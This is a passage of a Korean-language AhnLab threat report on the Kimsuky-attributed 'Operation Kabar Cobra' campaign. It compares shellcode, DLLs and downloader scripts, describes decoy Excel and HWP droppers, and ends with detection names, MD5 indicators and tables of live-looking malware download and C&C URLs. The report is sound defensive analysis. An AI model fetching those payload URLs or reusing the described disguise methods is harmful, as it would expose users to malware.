34 기능과특징, 그리고악성코드와관련된침해사고조사정보를수집하여해당악성코드가어떻게변형되었고, 공격대상은무엇이며, 공격자또는그배후를밝힘으로써향후일어날수있는침해사고를예측하고대비하는작업이라할수있다. 포괄적인정보를수집하고분석해야하는만큼많은시간을필요로하지만침해사고대응을위해반드시필요한작업이다. 그러나공격자들은악성코드프로파일링을방해하거나혼란을주기위해다음과같이다양한방법을동원하고있다. 악성코드패턴다변화및사용주기단축 다른악성코드의기능및특징모방 다양한위장기법 (False Flag) 사용 공개된해킹툴사용 VPN IP 또는경유지 PC를악용하여공격자추적회피 다양한실행압축패커및프로그래밍언어사용 이외에도공격자들은악성코드프로파일링을무력화하기위한여러가지기법들을고안하고있다. 따라 서악성코드프로파일리은 A 는 B 다라는 100% 확신이아니라 A 는 B 도, C 도, D 도될수있다는다양한 경우의수속에서구체적인하나로가능성을높여가는작업이라할수있다. 이러한관점에서이번오퍼레이션카바코브라의배후로 Kimsuky 그룹으로특정한배경은해당그룹의 소행일가능성이높다는점에서기인한다. 오퍼레이션카바코브라의공격대상의변화부터악성코드 유포지및 C&C 분석, 그외공격배후를추정한구체적인근거를살펴본다. 1. 공격대상의변화 일반적으로표적공격 (target attack) 은일정기간동안특정분야를대상으로지속적으로시도한후경 우에따라다른분야로공격대상을변경한다. 이에반해오퍼레이션카바코브라의공격대상은군사 관련기관 (ROTC), 언론분야, 암호화폐관련분야, 의류산업분야등으로다양한것이특징이다. AhnLab, Inc. All rights reserved. 34
35 앞서 [ 표 1] 에서정리한오퍼레이션카바코브라의시기별공격대상외에도 [ 표 8] 과같이암호화폐및 의류산업분야를대상으로유포된악성코드가확인되었다. 발견시기파일명위장파일형식공격대상 확인되지않음 엑셀 ( 이더리움지갑정보 ) 암호화폐 AR.xls{ 공백 }.exe 엑셀 ( 중국위안화로표기된견적서 ) 의류회사 [ 표 8] 추가공격대상별드롭퍼파일명및위장파일형식 (* 파일발견시기와실제유포시기는상이할수있음 ) [ 표 8] 에정리한드롭퍼는앞서살펴본군사기관공격사례 (2019 사업계획서.hwp{ 공백 }.exe) 와언론분야공격사례 ( 미디어권력이동6-넷플렉스, 유튜브.hwp{ 공백 }.exe) 에사용된파일과동일하게 WinRAR SFX(Self-extracting archive, 자동압축풀림 ) 방식으로압축되어있으며, 압축파일내부에는악의적인기능을수행하는악성스크립트가존재한다. 암호화폐를노린공격에는 [ 그림 45] 와같이사용자이름과이더리움주소등의내용으로위장한엑셀 파일을이용했다. 이위장용파일에보이는이더리움주소의거래내역은구글에서검색가능하지만, 실 제사용자의정보와동일한것인지는확인할수없었다. [ 그림 45] 암호화폐를노린공격에사용된위장용엑셀파일의내용 AhnLab, Inc. All rights reserved. 35
36 앞서살펴본사례에서악성코드가공격자의구글드라이브에업로드된파일에서 C&C 정보를다운로드 했다. 이와달리암호화폐를노린공격에서는악성스크립트 (2.wsf, 3.wsf) 로 C&C 정보를다운로드하는 과정은생략되었으며, serverurl 이란변수에 C&C 서버가명시되어있다. 또한감염 PC 에특정압축프로그램 (WinRAR, ALZIP) 이설치되어있을경우, 비밀번호가적용된압축파 일 (brave.ru) 을, 그렇지않을경우에는 BASE64 로암호화된 brave.ct( 복호화하면 Freedom.dll 임 ) 을다운로 드하기위한분기과정이추가되었다 ([ 그림 46] 참고 ). [ 그림 46] 압축프로그램설치여부확인후파일다운로드 의류산업분야를노린공격에서는 [ 그림 47] 과같은견적서로위장한엑셀파일을이용했다. 해당엑셀 파일의상단에는창세기직물수입및수출 ( 创世纪面料进出口 ) 이라는제목이중국어간체로작성되어있 으며, 중국위완화로견적을작성한것처럼위장하고있다. AhnLab, Inc. All rights reserved. 36
37 [ 그림 47] 의류산업분야에유포된위장용엑셀파일의내용 [ 그림 48] 은의류산업분야를대상으로유포된드롭퍼의내부에존재하는악성스크립트 (thumbs.wsf) 로, 기존의 2.wsf 나 3.wsf 보다간단하게제작되어있다. [ 그림 48] thumbs.wsf 내용 그러나 thumbs.wsf 를발견했을당시, [ 그림 48] 에보이는 URL 은더이상동작하지않았기때문에정확한 용도를파악할수없었다. 다만, 해당 URL 에서다음과같이악성코드가유포된이력이있었다. rnyacount-jpadmin.hol.es 의악성코드유포이력 h**p://rnyacount-jpadmin.hol.es/est/down/msofficeupdate64 h**p://rnyacount-jpadmin.hol.es/est/down/fw.a 해당 URL 주소의 rnyacount는얼핏보면의미없는단어나오탈자처럼보이지만영어단어 my account( 내계정 ) 와유사하게보인다. 마찬가지로 jpadmin에는관리자페이지를의미하는 admin이라는단어를포함하고있다. 즉, 정상적인관리자페이지로위장하기위한것으로짐작할수있다. 또한해당 URL의 png?_= 다음의파라미터문자열은 ID로되어있는데, 해당 ID는구글에서검색할수있는특정의류업체와관련된단어였다. 이러한점으로미루어 AR.xls{ 공백 }.exe는의류산업분야를노린것으로추정된다. AhnLab, Inc. All rights reserved. 37
38 2. 악성코드유포지및 C&C 서버 악성코드분석과정에서추출한악성코드유포지, C&C 서버는 (NE) 와연결되는데, 해당 IP 와다수의 URL 이연결되어있었다. 그중일부 URL 을 [ 표 9] 와같이정리했다. [ 표 9] 에서볼수있는것처럼 URL 은대부분국내유명포털사이트와구글, 마이크로소프트, 그리고국 내보안업체등의이름으로위장하고있다. 이들 URL 은악성코드유포나피싱사이트, C&C 서버로사 용됐다. IP URL URI navem-rnail.hol.es navem-rnail.hol.es/est/down/msofficeupdate64 myaccounnts-goggle.esy.es bmail-or-kr.esy.es aiyac-updaite.hol.es rnyacount-jpadmin.hol.es aiyac-updaite.hol.es/est/down/alyacmonitor64 aiyac-updaite.hol.es/est/down/msofficeupdate64 rnyacount-jpadmin.hol.es/est/down/msofficeupdate64 rnyacount-jpadmin.hol.es/est/down/fw.a (NE) ms-performance.hol.es msperformance.hol.es/mysite/down/msperformancecheck.b msperformance.hol.es/mysite/down/msperformancecheck64 suppcrt-seourity.esy.es ahnniab.esy.es ahnniab.esy.es/w/down/alyacmonitor.a ahnniab.esy.es/w/down/tvengine.dll daum-safety-team.esy.es myacccounts-goggle.esy.es myacccount-goggle.esy.es nav-mail.hol.es AhnLab, Inc. All rights reserved. 38
39 mail-support.esy.es my-homework.890m.com my-homework.890m.com/gnu/download/tvengine.dll my-homework.890m.com/gnu/download/list.dll nid-mail.hol.es nid-mail.esy.es/gnu//download/tmp.dll nid-mail.esy.es/gnu//download/notepad64.exe nid-mail.esy.es/bbs/data/tmp/x64/wall.cab nid-mail.esy.es nid-mail.esy.es/bbs/data/tmp/logger/private32 nid-mail.esy.es/bbs/data/tmp/logger/private64 nid-mail.esy.es/bbs/data/tmp/logger/secu32_init nid-mail.esy.es/bbs/data/tmp/logger/secu64_init nid-mail.pe.hu newsea36-chol.esy.es acount-qooqle.pe.hu myprofileacc.pe.hu customer-center.esy.es need-nver.hol.es daum-settting.hol.es nid-never.pe.hu nid-naver.hol.es [ 표 9] 특정 IP 에연결된악성 URL 정보 3. 공격배후추정근거 1. 악성한글문서의쉘코드비교 Kimsuky 그룹이 2014 년에제작한 한울 1,2 호기설계변경사항.hwp 와 2018 년에제작한 core.dll 을생 성하는 종전선언.hwp 를분석한결과, 두악성한글파일의쉘코드가동일함을확인할수있다. AhnLab, Inc. All rights reserved. 39
40 [ 그림 49] 2014 년악성한글문서 ( 위 ) 와 2018 년악성한글문서 ( 아래 ) 쉘코드비교 [ 그림 49] 의왼쪽은두악성한글문서에존재하는쉘코드의유사도를비교한것으로, 회색부분은동일 한코드를의미한다. 이들두악성한글문서에존재하는쉘코드가동일하다는점에서모두 Kimsuky 그 룹이제작한것으로짐작할수있다. 한편, Kimsuky 그룹이오래된한글취약점과쉘코드를 2018 년종전선언.hwp 에서도사용한이유는이그 룹이노리는공격대상이여전히오래된버전의한글프로그램을최신보안업데이트를적용하지않은 채사용중이라는것을알고있었다는추론이가능하다. [ 그림 50] 2018 년종전선언.hwp 의취약한문단텍스트 (HWPTAG_PARA_TEXT) AhnLab, Inc. All rights reserved. 40
41 한글과컴퓨터 (Hancom, 이하한컴 ) 사에서는한글프로그램의보안강화를위해동적보안모듈을탑재한바있다. 이로인해한글취약점을이용하는것이좀더어려워지자공격자들은이를우회하기위해한글프로그램의외부기능인고스트스크립트 (GhostScript) 취약점을악용하고있다. 이에한컴은고스트스크립트기능을제거하는보안업데이트를배포했다. 그러나여전히상당수의사용자들이해당보안업데이트를적용하지않고취약한버전의한글프로그램을사용하고있다. 공격자들이여전히고스트스크립트취약점을이용하고있는이유도이때문이다. 2. 악성코드비교 2017년에제작된, 그러나유포대상은알려지지않은악성한글파일과 2018년에제작된종전선언.hwp 는실행시 core.dll이라는악성파일을생성한다. core.dll을비교하면자기자신을실행하는파일은 rundll32.exe와 regsvr32.exe로각각다르지만, [ 그림 51] 과 [ 그림 52] 에서볼수있는것처럼코드는동일하다. 물론, 이코드는다른악성코드에서도볼수있기때문에이것만으로두악성파일을 Kimsuky 그룹의것으로판단할근거로는다소부족하다. [ 그림 51] 2017 년유포된한글파일이생성한 core.dll 의실행코드 [ 그림 52] 2018 년 종전선언.hwp 가생성한 core.dll 의실행코드 AhnLab, Inc. All rights reserved. 41
42 2017 년에제작된 core.dll 의변종도다수존재하는것으로확인됐다. 관련변종들을비교한결과, 공격자 는 core.dll 의기본틀은유지하되제작및공격시기등에따라코드를변경한것으로보인다. [ 그림 53] 2017 년 core.dll 의 Run() 함수비교 [ 그림 53] 은 2017 년에발견된 3 개의 core.dll 에공통적으로존재하는 EXPORT 함수인 Run 함수의코드를 비교한것이다. 얼핏보기에는모두다르게보이지만세부적으로확인해보면동일한코드가존재한다. 한편, 2017 년에제작된 core.dll 이이번사례와연관되어있다는것은앞서악성한글문서의쉘코드를 비교한것처럼악성코드의유사도비교를통해확인할수있다. AhnLab, Inc. All rights reserved. 42
43 [ 그림 54] 2017 년 core.dll( 왼쪽 ) 과 2019 년 Freedom.dll( 오른쪽 ) [ 그림 54] 는두악성코드가자기자신을실행하는방식으로, 로딩된프로세스가 notepad.exe이면종료하는동일한방식의코드를확인할수있다. 2019년에제작된 Freedom.dll는 memset, sprint_s() 등일부 C 표준함수가 Sub Call 형태로변환되어있고, 일부문자열이암호화되어있는것이특징이다. 보안업체의분석을방해하기위해변형한것으로보인다. 두악성코드가암호화된문자열을복호화할때사용하는복호화키패턴은 4 바이트씩, 총 32 바이트의 패턴으로동일하다. 해당복호화키를사용하여암호화된문자열을복호화하는코드는동일하지는않지 만 [ 그림 55] 와같이매우유사한모습을보인다. [ 그림 55] 2017 년 core.dll( 왼쪽 ) 과 2019 년 Freedom.dll( 오른쪽 ) 의복호화코드 AhnLab, Inc. All rights reserved. 43
44 2018 년정보보고.wsf, 2018 년종전선언.hwp, 그리고 core.dll 에의해생성된 2018 년 fontchk.jse 는악성 스크립트로, 앞서살펴본악성스크립트들 (2.wsf, 3.wsf) 과코드및동작방식이동일하다. [ 그림 56] 은이들 3 개스크립트의코드일부를비교한것이다. 이중정보보고.wsf 는다운로드한악성코 드를실행만하는반면, fontchk.jse 와 2.wsf 는다운로드한악성코드를실행한후그결과를 C&C 서버로 전송한다. [ 그림 56] 악성스크립트의코드비교 [ 그림 56] 에보이는 suppcrt-seourity.esy.es 는앞서 [ 표 5] 와함께살펴본 C&C 서버와동일한 IP 에연결 되어있다. 또한, [ 그림 57] 에서볼수있는것처럼 2017 년 core.dll, 2018 년 fontchk.jse 그리고 2019 년 2.wsf 는악성코드를추가로다운로드하기위해 C&C 서버또는공격자의구글드라이브와통신한다. AhnLab, Inc. All rights reserved. 44
45 [ 그림 57] 공격자의구글드라이브와통신코드비교 [ 그림 58] 은 2016년제46차원내대책회의모두발언.hwp와 2018년종전선언.hwp에존재하는쉘코드이다. 해당쉘코드는 notepad.exe, userinit.exe, explorer.exe 등과같이정상적인프로세스에인젝션되어실행된다. 또한해당쉘코드는메모리에서만존재하며, 악성코드를복호화하여실행하는데사용된다. 비교를통해동일한구조임을확인할수있다. [ 그림 58] 악성한글파일의쉘코드비교 AhnLab, Inc. All rights reserved. 45
46 또한 [ 그림 59] 와같이 Kimsuky 그룹의악성코드중일부는 %APPDATA%\Microsoft\HNC 라는폴더에 악성코드를생성하거나수집한정보를저장한다. 이는한글프로그램 (HNC) 과관련된파일로위장하기 위함으로보인다. [ 그림 59] 2016 년메모리실행악성코드 ( 왼쪽 ) 와 2017 년 hwpkor.dll( 오른쪽 ) 지금까지악성코드프로파일링을통해확인한특징을요약하면다음과같다. 악성한글문서에동일한쉘코드존재 악성스크립트의코드및동작방식동일 core.dll과추가로생성된악성코드의코드및동작방식동일 C&C 서버와연결된 IP 동일 이러한특징을근거로오퍼레이션카바코브라로명명된공격을주도한것은 Kimsuky 그룹으로추정된 다. AhnLab, Inc. All rights reserved. 46
47 결론 Kimsuky 그룹은 2016 년후반까지는정보수집을위한표적공격에주력했다. 그러나이번오퍼레이션 카바코브라를통해서확인한것처럼, 현재그들은소속국가의정치적, 경제적상황을타계하기위해 투트랙 (two track) 방식의표적공격을전개하고있다. 지금까지도 Kimsuky 그룹으로의심되는공격사례를비롯해한국기관및기업을노린다수의표적공격이발생하고있다. 정치적협력관계와는별개로, Kimsuky 그룹을포함해우리나라에서활동하고있는여러공격그룹의움직임을지속적으로관찰하고대응하기위해국가기관과보안업체들의긴밀한공조가요구되는시점이다. 또한이번사례에서확인한것처럼여전히알려진취약점을이용한표적공격이계속되고있다. 따라서 기업및기관에서는지속적이며효과적인패치관리를통해운영체제및소프트웨어취약점을이용한 공격에대비해야한다. 안랩제품대응현황 안랩 V3 제품군에서는오퍼레이션카바코브라와관련된악성코드를다음과같은진단명으로탐지하고 있다. MD5 V3 진단명 V3 엔진버전 20301fdd013c836039b8cfe0d100a1d7 Trojan/Win32.Agent b02f f0912b2ae3f27498c448f Trojan/Win32.XwDoor cd705902ea42d0de2a8456b055c3bb87 Malware/Win32.Possible_scrdl AhnLab, Inc. All rights reserved. 47
48 cfd7029a26a3f3f5e9087d8a HWP/Exploit b7359ae1a83323d3671e7c3a63ce7bf1 OLE/Cve Gen b994bd755e034d2218f8a3f70e91a165 Backdoor/Win32.Agent ba89337af43f0b07a35cc892ac95112a Backdoor/Win32.Akdoor c0ec36be15fe3403f3abad6ecea75 Downloader/Win32.Agent ab73b c48d62b7eeb5c9f3409d Win-Trojan/Agent f22db1e3ea74af791e34ad5aa JS/Agent fc4829c2fff9fb240acbd71c60fc67 Dropper/Win32.TeamRat d453be4ae28d89f207e921 Trojan/Win32.Agent a32a76aecb099af53255bb90737 Backdoor/Win32.Akdoor dc d9a59ab477ebc62d07a255e Malware/Win32.Possible_scrdl eb739c8faf77dae0546ff447ad06038 Dropper/Win32.Agent c31d0ce2109fdface788663e90f49 Trojan/Win32.Agent b73fba4e47b3184edd75b0ce9cf928 Trojan/Win32.Agent ec829db01818d305552ec4ebb1c258 Backdoor/Win32.Agent c3396aa bf1396a2ca Dropper/Win32.Agent dfe826f71c20ff04987a9160c177e46 Backdoor/Win32.Agent d9e625ea3efbcbef3963c a7 HWP/Exploit de21c3af64b3b de92dfff4 Trojan/Win32.Akdoor b49bbc11ed000211a5af7eb35f VBS/Exploit be c16868c1ad6b4efe7 HWP/Exploit d685308d3125e14287ecb7fbe5fcd37 Backdoor/Win32.Agent bb42e6649d927899c816cc04c2bffc06 Trojan/Win32.Agent fdf23367c604511d019a6914c50bc0b Trojan/Win32.Agent AhnLab, Inc. All rights reserved. 48
49 AEA8D A58D5189A8E886CF8 HWP/Exploit E221246BB59CDE7C3E8363C7 Trojan/Win32.Akdoor f26f3a883aeca9a fc7d4750 Backdoor/Win32.Akdoor cc6129dc887629a c7547e5 Trojan/Win32.Agent a45ba001c3abee03bda49c6816d9a17c Backdoor/Win32.Agent IoC (Indicators of Compromise) 정보 1. MD 사업계획서.hwp{ 공백 }.exe 0eb739c8faf77dae0546ff447ad06038 미디어권력이동6-넷플렉스, 유튜브.hwp{ 공백 }.exe 9c3396aa bf1396a2ca 중국-연구자료.hwp{ 공백 }.scr 20301fdd013c836039b8cfe0d100a1d7 AR.xls{ 공백 }.exe dc d9a59ab477ebc62d07a255e { 미상 }.exe cd705902ea42d0de2a8456b055c3bb87 Freedom.dll & AhnLabMon.dll & AlyacMonitor.db 242c31d0ce2109fdface788663e90f d453be4ae28d89f207e921 66b73fba4e47b3184edd75b0ce9cf928 Cobra.dll b994bd755e034d2218f8a3f70e91a165 1DFE826F71C20FF04987A9160C177E46 1A082A388A285E7FC F3910 secu32_init.inf 71EC829DB01818D305552EC4EBB1C258 2fdf23367c604511d019a6914c50bc0b private32.db 566cc6129dc887629a c7547e5 AhnLab, Inc. All rights reserved. 49
50 9D685308D3125E14287ECB7FBE5FCD37 core.dll bb42e6649d927899c816cc04c2bffc06 874C0EC36BE15FE3403F3ABAD6ECEA75 4DE21C3AF64B3B DE92DFFF A32A76AECB099AF53255BB90737 tvengine.dll a45ba001c3abee03bda49c6816d9a17c ariak.dll 0a50827a4897a43a882c8d3c691d943d IECheck.dll 02dae3046d1669a55785ba935b0e3f0b 45D3.tmp ba89337af43f0b07a35cc892ac95112a MsMpQhp.exe 74c3011b6980bea23d119822d979a364 TeamViewer ab73b c48d62b7eeb5c9f3409d b02f f0912b2ae3f27498c448f 11fc4829c2fff9fb240acbd71c60fc 한울 1,2 호기설계변경사항.hwp CFD7029A26A3F3F5E9087D8A 2018 종전선언.hwp 8332be c16868c1ad6b4efe7 fontchk.jse f22db1e3ea74af791e34ad5aa 월 1주차국제안보군사정세.hwp 48d9e625ea3efbcbef3963c a7 IE 취약점 (CVE ) B49BBC11ED000211A5AF7EB35F 년제46차원내대책회의모두발언.hwp AEA8D A58D5189A8E886CF8 0x0ED6D109-0xED81000.mem.pe.exe E221246BB59CDE7C3E8363C7 hwpkor.dll 2f26f3a883aeca9a fc7d C&C 및 URL IP URL FULL URL navem-rnail.hol.es navem-rnail.hol.es/est/down/msofficeupdate64 myaccounnts-goggle.esy.es (NE) bmail-or-kr.esy.es aiyac-updaite.hol.es aiyac-updaite.hol.es/est/down/alyacmonitor64 aiyac-updaite.hol.es/est/down/msofficeupdate64 rnyacount-jpadmin.hol.es rnyacount-jpadmin.hol.es/est/down/msofficeupdate64 AhnLab, Inc. All rights reserved. 50
51 rnyacount-jpadmin.hol.es/est/down/fw.a ms-performance.hol.es msperformance.hol.es/mysite/down/msperformancecheck.b msperformance.hol.es/mysite/down/msperformancecheck64 suppcrt-seourity.esy.es ahnniab.esy.es ahnniab.esy.es/w/down/alyacmonitor.a ahnniab.esy.es/w/down/tvengine.dll daum-safety-team.esy.es myacccounts-goggle.esy.es myacccount-goggle.esy.es nav-mail.hol.es mail-support.esy.es my-homework.890m.com my-homework.890m.com/gnu/download/tvengine.dll my-homework.890m.com/gnu/download/list.dll nid-mail.hol.es nid-mail.esy.es/gnu//download/tmp.dll nid-mail.esy.es/gnu//download/notepad64.exe nid-mail.esy.es/bbs/data/tmp/x64/wall.cab nid-mail.esy.es nid-mail.esy.es/bbs/data/tmp/logger/private32 nid-mail.esy.es/bbs/data/tmp/logger/private64 nid-mail.esy.es/bbs/data/tmp/logger/secu32_init nid-mail.esy.es/bbs/data/tmp/logger/secu64_init nid-mail.pe.hu newsea36-chol.esy.es acount-qooqle.pe.hu myprofileacc.pe.hu customer-center.esy.es AhnLab, Inc. All rights reserved. 51
52 need-nver.hol.es daum-settting.hol.es nid-never.pe.hu nid-naver.hol.es 별첨 도움주신분들 이번 OPERATION: KABAR COBRA 분석리포트가나오기까지많은분들의도움과피드백이있었습니다. 그분들께감사의마음을전합니다. 안랩 ASEC대응팀박태환, 양태연, 이선호 안랩분석연구팀차민석 이스트시큐리티문종현 금융보안원장민창 한국인터넷진흥원 (KISA) 김병재 그외헌신 ( 獻身 ) 하는무명 ( 無名 ) 의보안전문가들 AhnLab, Inc. All rights reserved. 52
< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More informationASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationRed Eyes Hacking Group 상세분석 안랩시큐리티대응센터 (ASEC) 분석연구팀 경기도성남시분당구판교역로 220 ( 우 ) 대표전화 : 팩스 : AhnL
2018.04.03 Red Eyes Hacking Group 상세분석 안랩시큐리티대응센터 (ASEC) 분석연구팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 개요... 3 레드아이즈공격그룹활동현황...
More information#HNS-WI 북한의심 APT 공격에대한 Kaspersky 의분석정리
#HNS-WI-13-028 북한의심 APT 공격에대한 Kaspersky 의분석정리 2013-09-12 내용요약 이보고서는 Kaspersky의 Dmitry Tarakanov가작성하여우리나라시간으로 9월 12일발표한 The Kimsuky Operation: A North Korean APT? 를정리및분석한것으로, Kaspersky는지난몇달동안한국의세종연구소, KIDA(
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More information목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응
MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,
More information목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.
Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More informationSecurity Trend ASEC Report VOL.56 August, 2014
Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationDDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS
DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.
More information슬라이드 1
휴지통포렌식 JK Kim @pr0neer proneer@gmail.com 개요 1. 휴지통 2. 휴지통파일구조 3. 휴지통파일카빙 4. 휴지통파일분석 2 휴지통 Security is a people problem 3 휴지통 휴지통이란? 휴지통소개 윈도우에서파일을삭제할경우, 기본적으로삭제된파일은휴지통 (Recycle Bin) 영역으로이동 휴지통우회방법 SHIFT
More informationASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.76 April, 2016 ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More information[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀
[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀 2011-08-04 SK 커뮤니케이션즈해킹주요내용 : 지난 7 월 26 일 ( 화 ) SK 커뮤니케이션즈가해킹으로인해일부고객의정보가유출된사실이확인되었고, 28 일 ( 목 ) 홈페이지팝업공지문 ( 개인정보유출 ) 과함께관련된언론보도자료가배포되었다. 이는 3500
More information아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상
Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는
More informationASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작
Security Trend ASEC REPORT VOL.80 August, 2016 ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
